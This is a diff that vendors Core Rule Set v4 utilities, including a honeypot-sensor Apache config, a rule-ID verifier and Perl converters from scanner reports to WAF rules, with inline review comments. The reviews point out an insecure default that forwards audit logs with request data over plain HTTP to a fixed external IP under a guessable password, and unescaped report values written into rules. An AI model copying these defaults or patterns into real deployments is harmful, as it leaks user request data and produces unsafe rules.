b/src/common/core/modsecurity/files/coreruleset-v4/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf new file mode 100644 index 000000000..7002bb76e --- /dev/null 
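Review bot: `SensorPassword "test1234"` and `ConsoleURI "http://204.13.200.239/rpc/auditLogReceiver"` ship a shared, guessable credential and a plain-HTTP endpoint at a fixed IP address, so anyone who enables this sample as-is sends ModSecurity audit-log entries, which carry full request data, unencrypted to a host they do not control. If util/honeypot-sensor has to be vendored at all, the defaults should not be usable unchanged, e.g. `ConsoleURI "https://<your-console-host>/rpc/auditLogReceiver"` and `SensorPassword "<set-per-deployment>"`, with a comment above them stating that both values must be replaced before use. The same concern covers modsecurity_crs_10_honeypot.conf in this commit, whose `SecAuditLog "|/usr/local/apache/bin/mlogc /usr/local/apache/conf/mlogc-honeypot-sensor.conf"` line pipes the audit log into this configuration. Excluding the directory from the packaged ruleset would be the simpler option.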
+++ b/src/common/core/modsecurity/files/coreruleset-v4/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf
@@ -0,0 +1,30 @@
+#
+# Add in honeypot ports.
+# - These are common proxy ports used by attackers
+# - All traffic accepted on these ports are suspicious.
+#
+Listen 8000
+Listen 8080
+Listen 8888
+
+#
+# Create basic virtual host containers that will forward all traffic received
+# to the official ModSecurity Project honeypot logging host.
+#
+# - You should adjust the Document root location to an empty directory on your server
+# - Also adjust the path to your local ModSecurity mlogc program and for the
+# mlogc-honeypot-sensor.conf file.
+# - Make sure you main SecAuditLogType is set to concurrent mode.
+#
+
+ServerName www.example1.com
+DocumentRoot "/usr/local/apache/honeypot-htdocs"
+
+ Options none
+ AllowOverride None
+ Order allow,deny
+ Allow from all
+
+SecAuditEngine On
+SecAuditLog "|/usr/local/apache/bin/mlogc /usr/local/apache/conf/mlogc-honeypot-sensor.conf"
+
diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/id-range b/src/common/core/modsecurity/files/coreruleset-v4/util/id-range
new file mode 100644
index 000000000..a58cf06e4
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v4/util/id-range
@@ -0,0 +1,2 @@
+900000-2999999
+2000000-299999
diff --git a/src/common/core/modsecurity/files/coreruleset/util/join-multiline-rules/join.py b/src/common/core/modsecurity/files/coreruleset-v4/util/join-multiline-rules/join.py
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/join-multiline-rules/join.py
rename to src/common/core/modsecurity/files/coreruleset-v4/util/join-multiline-rules/join.py
diff --git a/src/common/core/modsecurity/files/coreruleset/util/php-dictionary-gen/php-dictionary-creator.sh b/src/common/core/modsecurity/files/coreruleset-v4/util/php-dictionary-gen/php-dictionary-creator.sh
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/php-dictionary-gen/php-dictionary-creator.sh
rename to src/common/core/modsecurity/files/coreruleset-v4/util/php-dictionary-gen/php-dictionary-creator.sh
diff --git a/src/common/core/modsecurity/files/coreruleset/util/php-dictionary-gen/php-high-risk-functions.txt b/src/common/core/modsecurity/files/coreruleset-v4/util/php-dictionary-gen/php-high-risk-functions.txt
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/php-dictionary-gen/php-high-risk-functions.txt
rename to src/common/core/modsecurity/files/coreruleset-v4/util/php-dictionary-gen/php-high-risk-functions.txt
diff --git a/src/common/core/modsecurity/files/coreruleset/util/regexp-tricks/negative-lookahead.py b/src/common/core/modsecurity/files/coreruleset-v4/util/regexp-tricks/negative-lookahead.py
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/regexp-tricks/negative-lookahead.py
rename to src/common/core/modsecurity/files/coreruleset-v4/util/regexp-tricks/negative-lookahead.py
diff --git a/src/common/core/modsecurity/files/coreruleset/util/rule_ctl/README.md b/src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/README.md
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/rule_ctl/README.md
rename to src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/README.md
diff --git a/src/common/core/modsecurity/files/coreruleset/util/rule_ctl/pyproject.toml b/src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/pyproject.toml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/rule_ctl/pyproject.toml
rename to src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/pyproject.toml
diff --git a/src/common/core/modsecurity/files/coreruleset/util/rule_ctl/requirements.txt b/src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/requirements.txt
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/rule_ctl/requirements.txt
rename to src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/requirements.txt
diff --git a/src/common/core/modsecurity/files/coreruleset/util/rule_ctl/rule_ctl.py b/src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/rule_ctl.py
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/rule_ctl/rule_ctl.py
rename to src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/rule_ctl.py
diff --git a/src/common/core/modsecurity/files/coreruleset/plugins/empty-after.conf b/src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/__init__.py
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/plugins/empty-after.conf
rename to src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/__init__.py
diff --git a/src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/helpers.py b/src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/helpers.py
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/helpers.py
rename to src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/helpers.py
diff --git a/src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/rule_ctl_actions_test.py b/src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/rule_ctl_actions_test.py
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/rule_ctl_actions_test.py
rename to src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/rule_ctl_actions_test.py
diff --git a/src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/rule_ctl_ctl_test.py b/src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/rule_ctl_ctl_test.py
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/rule_ctl_ctl_test.py
rename to src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/rule_ctl_ctl_test.py
diff --git a/src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/rule_ctl_tags_test.py b/src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/rule_ctl_tags_test.py
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/rule_ctl_tags_test.py
rename to src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/rule_ctl_tags_test.py
diff --git a/src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/rule_ctl_test.py b/src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/rule_ctl_test.py
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/rule_ctl_test.py
rename to src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/rule_ctl_test.py
diff --git a/src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/rule_ctl_transformations_test.py b/src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/rule_ctl_transformations_test.py
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/rule_ctl_transformations_test.py
rename to src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/rule_ctl_transformations_test.py
diff --git a/src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/rule_ctl_variables_test.py b/src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/rule_ctl_variables_test.py
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/rule_ctl_variables_test.py
rename to src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/rule_ctl_variables_test.py
diff --git a/src/common/core/modsecurity/files/coreruleset/util/send-payload-pls.sh b/src/common/core/modsecurity/files/coreruleset-v4/util/send-payload-pls.sh
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/send-payload-pls.sh
rename to src/common/core/modsecurity/files/coreruleset-v4/util/send-payload-pls.sh
diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/verify.rb b/src/common/core/modsecurity/files/coreruleset-v4/util/verify.rb
new file mode 100755
index 000000000..6619fcbc5
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v4/util/verify.rb
@@ -0,0 +1,117 @@ +#!/usr/bin/env ruby +# -*- coding: utf-8 -*- +# +# Copyright © 2012 Diego Elio Pettenò +# +# Permission to use, copy, modify, and distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND INTERNET SOFTWARE CONSORTIUM DISCLAIMS +# ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES +# OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL INTERNET SOFTWARE +# CONSORTIUM BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL +# DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR +# PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS +# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS +# SOFTWARE. + +require 'set' + +seen_ids = Set.new +res = 0 + +# read reserved id range from the id-range file so that it can be +# configured on a per-repository basis. +range = Range.new(*File.read('id-range').rstrip.split('-').map(&:to_i)) + +# open all the rule files +Dir.chdir("../") +Dir["**/*.conf"].each do |rulefile| + # read the content + content = File.read(rulefile) + + lineno = 0 + this_chained = next_chained = false + prevline = nil + + # for each line in the rule file + content.each_line do |line| + lineno += 1 + + # handle continuation lines + line = (prevline + line) unless prevline.nil? + + # remove comments + line.gsub!(/^([^'"]|'[^']+'|"[^"]+")#.*/) { $1 } + + if line =~ /\\\n$/ + prevline = line.gsub(/\\\n/, '') + next + else + prevline = nil + end + + # skip if it's an empty line (this also skip comment-only lines) + next if line =~ /(?:^\s+$|^#)/ + + this_chained = next_chained + next_chained = false + + # split the directive in its components, considering quoted strings + directive = line.scan(/([^'"\s][^\s]*[^'"\s]|'(?:[^']|\\')*[^\\]'|"(?:[^"]|\\")*[^\\]")(?:\s+|$)/).flatten + directive.map! 
do |piece| + # then make sure to split the quoting out of the quoted strings + (piece[0] == '"' || piece[0] == "'") ? piece[1..-2] : piece + end + + # skip if it's not a SecRule or SecAction + case directive[0] + when "SecRule" + rawrule = directive[3] + when "SecAction" + rawrule = directive[1] + else + next + end + + # get the rule and split in its components + rule = (rawrule || "").gsub(/(?:^"|"$)/, '').split(/\s*,\s*/) + + if rule.include?("chain") + next_chained = true + end + + ids = rule.find_all { |piece| piece =~ /^id:/ } + if ids.size > 1 + $stderr.puts "#{rulefile}:#{lineno} rule with multiple ids" + next + elsif ids.size == 0 + id = nil + else + id = ids[0].sub(/^id:/, '').gsub(/(?:^'|'$)/, '').to_i + end + + if this_chained + unless id.nil? + $stderr.puts "#{rulefile}:#{lineno} chained rule with id" + res = 1 + end + next + elsif id.nil? + $stderr.puts "#{rulefile}:#{lineno} rule missing id (#{rule.join(',')})" + res = 1 + next + elsif ! range.include?(id) + $stderr.puts "#{rulefile}:#{lineno} rule with id #{id} outside of reserved range #{range}" + res = 1 + elsif seen_ids.include?(id) + $stderr.puts "#{rulefile}:#{lineno} rule with duplicated id #{id}" + res = 1 + end + + seen_ids << id + end +end + +exit res diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/virtual-patching/arachni2modsec.pl b/src/common/core/modsecurity/files/coreruleset-v4/util/virtual-patching/arachni2modsec.pl new file mode 100755 index 000000000..9b6a3c256 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/util/virtual-patching/arachni2modsec.pl 
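Review bot: The reserved range is built with `Range.new(*File.read('id-range').rstrip.split('-').map(&:to_i))`, but the id-range file added in this commit has two lines (`900000-2999999` and `2000000-299999`), so the split yields three integers and the third is passed as Range's exclude_end argument. The second line is therefore never checked as a range; its only effect is to make the first range end-exclusive. If a single range is intended, read only the first line: `range = Range.new(*File.readlines('id-range').first.strip.split('-').map(&:to_i))`; if several are intended, parse one range per line and test `ranges.any? { |r| r.include?(id) }`. The "rule with multiple ids" branch also prints its message and calls `next` without `res = 1`, so that case does not fail the check.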
@@ -0,0 +1,318 @@ +#!/opt/local/bin/perl -T + +############################################# +# -=[ Virtual Patching Converter Script ]=- # +# Converts arachni XML Output # +# https://github.com/Zapotek/arachni # +# # +# arachni2modsec.pl # +# Version: 1.0 # +# # +# Copyright 2011 # +# Trustwave's SpiderLabs Research Team # +# www.trustwave.com # +# # +# Based On Code Originally Created by: # +# The Denim Group # +# www.denimgroup.com # +############################################# + +use XML::Smart; +use Switch; +use Data::Types qw(:all); +use Data::Validate::URI qw(is_uri); +use Getopt::Std; +use Acme::Comment type=>'C++', one_line=>1; #Block commenting, can be removed later + +############# +# Variables # +############# + +# [Configuration Vars] +my %param; +getopt("f",\%param); +$filename = $param{f}; +my $all_vulnerabilities_filename = "$filename"; + +unless ($filename) { + print "Flag:\n\n\t -f:\t path to arachni xml report file\nUsage:\n\n\t./arachni2modsec.pl -f ./arachni_report.xml\n\n"; + exit; +} + + +my $modsec_rules_file = "./modsecurity_crs_48_virtual_patches.conf"; + +# [End Config Vars] + +my $VULN_CLASS_XSS = "Cross-Site Scripting (XSS)"; +my $VULN_CLASS_SQLI = "SQL Injection"; +my $VULN_CLASS_BLIND_SQLI = "Blind SQL Injection"; +my $VULN_CLASS_LFI = "Path Traversal"; +my $VULN_CLASS_RFI = "Remote file inclusion"; +my $VULN_CLASS_HTTPRS = "Response splitting"; + +# Only the vulnerabilities in this array will have +# rules generated for them. 
+my @supported_vulns = ($VULN_CLASS_XSS, $VULN_CLASS_SQLI, $VULN_CLASS_BLIND_SQLI, $VULN_CLASS_LFI, $VULN_CLASS_RFI, $VULN_CLASS_HTTPRS); + +my $num_rules_generated=0; +my $num_not_supported=0; +my $num_bad_urls=0; + +my $wait_for_keypress=1; +my $request_failed=0; + +my $all_vulns_xml; +my @type; +my @id; +my $vuln_count; + +my $num_attacks_flag=0; +my $num_attacks_noflag=0; + +# End Vars ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + +############# +# Main # +############# + +# Clean up env so perl doesn't complain +# when trying to run the restart snort +# script. +delete @ENV{qw(IFS CDPATH ENV BASH_ENV PATH)}; + +$all_vulns_xml = XML::Smart->new($all_vulnerabilities_filename); + +@type = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','name'); +@url = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','url'); +@param = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','variable'); + +open(my $MODSEC_RULES, '>' , $modsec_rules_file) || die "Unable to open modsecurity rules file $modsec_rules_file"; +$MODSEC_RULES->autoflush(1); + +$vuln_count = 0; + +foreach my $current_type (@type){ + print "==================================================================================================\n"; + print "Vulnerability[$vuln_count] - Type: $current_type\n"; + + if(exists {map { $_ => 1 } @supported_vulns}->{$current_type}){ + parseData(to_string($current_type)); + }else { + print "Vulnerability Type: $type is not supported in this version.\n"; + $num_not_supported++; + } + $vuln_count++; +} + +close($MODSEC_RULES); + +print "==================================================================================================\n"; + +print "\n\n************ END OF SCRIPT RESULTS *****************\n"; +print "Number of Vulnerabilities Processed: $vuln_count\n"; +print "Number of ModSecurity rules generated: $num_rules_generated\n"; +print "Number of Unsupported vulns skipped: $num_not_supported\n"; +print "Number of bad URLs 
(rules not gen): $num_bad_urls\n"; +print "****************************************************\n\n"; +print "----------------------------------------------------\n"; +print "To activate the virtual patching file ($modsec_rules_file),\n"; +print "copy it into the CRS \"base_rules\" directory and then create\n"; +print "a symlink to it in the \"activated_rules\" directory.\n"; +print "-----------------------------------------------------\n\n"; + + +############### +# Subroutines # +############### +sub parseData +{ + my($vuln_str) = @_; + my $vuln_detail_filename; + my $current_vuln_xml; + my $current_vuln_url; + my $current_vuln_param; + my $current_uricontent; + my @current_params; + my $id = $vuln_count; + + print "Found a $vuln_str vulnerability.\n"; + + $current_vuln_xml = XML::Smart->new($all_vulnerabilities_filename); + $current_vuln_url = $url[$vuln_count]; + + print URL_LIST "$current_vuln_url\n"; + + # Validate url (need separate sub?) + print "Validating URL: $current_vuln_url\n"; + if(is_uri(to_string($current_vuln_url))){ + print "URL is well-formed\n"; + print "Continuing Rule Generation\n"; + } else { + print "URL is NOT well-formed. Breaking Out of Rule Generation\n"; + $num_bad_urls++; + + # Waits for keypress in test mode so you can + # see why the URL failed validation. + if($test_mode){ + wait_for_keypress(); + } + return; + } + + $current_uricontent = get_uricontent($current_vuln_url); + + + # Only need param if XSS attack,SQLINJ,XPATH + # and maybe for HTTPRS, DT. 
+ # NOT for PRL and DI + + if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){ + @current_params = $param[$vuln_count]; + + } + if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){ + print "Current vulnerable Param(s): @current_params\n"; + } + + generate_patch($vuln_str,$current_uricontent,@current_params); + + +} + + +sub generate_patch +{ + my($type,$uricontent,@params,$current_vuln_xml) = @_; + my $rule = ""; + $id = "1".$vuln_count; + + switch($type) + { + case ($VULN_CLASS_XSS) + { + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + # Check to see if each vulnerable parameter is valid + # then generate a rule using both uricontent and the + # parameter + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/XSS.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_XSS (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + } + } + } + } + + case ($VULN_CLASS_SQLI) + { + + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" 
\"setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + case ($VULN_CLASS_BLIND_SQLI) + { + + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + case ($VULN_CLASS_LFI) + { + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/LFI',tag:'WASCTC/WASC-33',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/LFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_LFI (uricontent and param) rule successfully 
generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + case ($VULN_CLASS_RFI) + { + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RFI',tag:'WASCTC/WASC-05',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/RFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + case ($VULN_CLASS_HTTPRS) + { + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RESPONSE_SPLITTING',tag:'WASCTC/WASC-25',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/RESPONSE_SPLITTING.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_RFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + } +} + +sub get_uricontent +{ + my($url) = @_; + my $regex = "http:\/\/+[a-zA-Z0-9.:-]*\/"; + + # First, trim the first part out of the URL: + # http://.../ + $url =~ /$regex/; + substr($url,index($url,$&),length($&)) = ""; + + # If the URL contains a php or cgi query with + # one or more params and values, trim those out. + # Trim from the question mark to the end. 
+ if($url =~ /\?/){ + substr($url,index($url,"?")) = ""; + } + return $url; + +} diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/virtual-patching/zap2modsec.pl b/src/common/core/modsecurity/files/coreruleset-v4/util/virtual-patching/zap2modsec.pl new file mode 100755 index 000000000..03fa21e03 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/util/virtual-patching/zap2modsec.pl 
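Review bot: In generate_patch the values taken from the scanner report, `$uricontent` and each parameter name `$_`, are interpolated unescaped into the `SecRule REQUEST_FILENAME \"$uricontent\" ...` and `TX:'/XSS.*ARGS:$_/'` strings, so a quote, newline or regex metacharacter in a reported URL or parameter yields a rule file that fails to load or matches something other than the intended endpoint. The report should be treated as untrusted input: skip values that do not match a conservative pattern before writing the rule, for example `next unless $_ =~ /\A[\w.\-\[\]]+\z/;` inside each `foreach(@params)`, and apply `quotemeta` where a value lands inside a regex. The rule ID is built as `$id = "1".$vuln_count`, which gives small IDs such as 10 and 11 that repeat on every run and fall outside the range in util/id-range; a dedicated local ID range would avoid collisions with other rules. zap2modsec.pl appears to share this structure, but its generate_patch is outside this view.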
@@ -0,0 +1,318 @@
+#!/opt/local/bin/perl -T
+
+#############################################
+# -=[ Virtual Patching Converter Script ]=- #
+# Converts OWASP ZAP XML Output #
+# https://code.google.com/p/zaproxy/ #
+# #
+# zap2modsec.pl #
+# Version: 1.0 #
+# #
+# Copyright 2011 #
+# Trustwave's SpiderLabs Research Team #
+# www.trustwave.com #
+# #
+# Based On Code Originally Created by: #
+# The Denim Group #
+# www.denimgroup.com #
+#############################################
+
+use XML::Smart;
+use Switch;
+use Data::Types qw(:all);
+use Data::Validate::URI qw(is_uri);
+use Getopt::Std;
+use Acme::Comment type=>'C++', one_line=>1; #Block commenting, can be removed later
+
+#############
+# Variables #
+#############
+
+# [Configuration Vars]
+my %param;
+getopt("f",\%param);
+$filename = $param{f};
+my $all_vulnerabilities_filename = "$filename";
+
+unless ($filename) {
+ print "Flag:\n\n\t -f:\t path to ZAP xml report file\nUsage:\n\n\t./zap2modsec.pl -f ./zap_report.xml\n\n";
+ exit;
+}
+
+
+my $modsec_rules_file = "./modsecurity_crs_48_virtual_patches.conf";
+
+# [End Config Vars]
+
+my $VULN_CLASS_XSS = "Cross Site Scripting";
+my $VULN_CLASS_SQLI = "SQL Injection";
+my $VULN_CLASS_SQLI_FINGERPRINT = "SQL Injection Fingerprinting";
+my $VULN_CLASS_LFI = "Path Traversal";
+my $VULN_CLASS_RFI = "Remote File Inclusion";
+my $VULN_CLASS_HTTPRS = "HTTP Response Splitting";
+
+# Only the vulnerabilities in this array will have
+# rules generated for them.
+my @supported_vulns = ($VULN_CLASS_XSS, $VULN_CLASS_SQLI, $VULN_CLASS_SQLI_FINGERPRINT, $VULN_CLASS_LFI, $VULN_CLASS_RFI, $VULN_CLASS_HTTPRS);
+
+my $num_rules_generated=0;
+my $num_not_supported=0;
+my $num_bad_urls=0;
+
+my $wait_for_keypress=1;
+my $request_failed=0;
+
+my $all_vulns_xml;
+my @type;
+my @id;
+my $vuln_count;
+
+my $num_attacks_flag=0;
+my $num_attacks_noflag=0;
+
+# End Vars ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+#############
+# Main #
+#############
+
+# Clean up env so perl doesn't complain
+# when trying to run the restart snort
+# script.
+delete @ENV{qw(IFS CDPATH ENV BASH_ENV PATH)};
+
+$all_vulns_xml = XML::Smart->new($all_vulnerabilities_filename);
+
+@type = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','alert');
+@url = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','uri');
+@param = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','param');
+
+open(my $MODSEC_RULES, '>' , $modsec_rules_file) || die "Unable to open modsecurity rules file $modsec_rules_file";
+$MODSEC_RULES->autoflush(1);
+
+$vuln_count = 0;
+
+foreach my $current_type (@type){
+ print "==================================================================================================\n";
+ print "Vulnerability[$vuln_count] - Type: $current_type\n";
+
+ if(exists {map { $_ => 1 } @supported_vulns}->{$current_type}){
+ parseData(to_string($current_type));
+ }else {
+ print "Vulnerability Type: $type is not supported in this version.\n";
+ $num_not_supported++;
+ }
+ $vuln_count++;
+}
+
+close($MODSEC_RULES);
+
+print "==================================================================================================\n";
+
+print "\n\n************ END OF SCRIPT RESULTS *****************\n";
+print "Number of Vulnerabilities Processed: $vuln_count\n";
+print "Number of ModSecurity rules generated: $num_rules_generated\n";
+print "Number of Unsupported vulns skipped: 
$num_not_supported\n";
+print "Number of bad URLs (rules not gen): $num_bad_urls\n";
+print "****************************************************\n\n";
+print "----------------------------------------------------\n";
+print "To activate the virtual patching file ($modsec_rules_file),\n";
+print "copy it into the CRS \"base_rules\" directory and then create\n";
+print "a symlink to it in the \"activated_rules\" directory.\n";
+print "-----------------------------------------------------\n\n";
+
+
+###############
+# Subroutines #
+###############
+sub parseData
+{
+ my($vuln_str) = @_;
+ my $vuln_detail_filename;
+ my $current_vuln_xml;
+ my $current_vuln_url;
+ my $current_vuln_param;
+ my $current_uricontent;
+ my @current_params;
+ my $id = $vuln_count;
+
+ print "Found a $vuln_str vulnerability.\n";
+
+ $current_vuln_xml = XML::Smart->new($all_vulnerabilities_filename);
+ $current_vuln_url = $url[$vuln_count];
+
+ print URL_LIST "$current_vuln_url\n";
+
+ # Validate url (need separate sub?)
+ print "Validating URL: $current_vuln_url\n";
+ if(is_uri(to_string($current_vuln_url))){
+ print "URL is well-formed\n";
+ print "Continuing Rule Generation\n";
+ } else {
+ print "URL is NOT well-formed. Breaking Out of Rule Generation\n";
+ $num_bad_urls++;
+
+ # Waits for keypress in test mode so you can
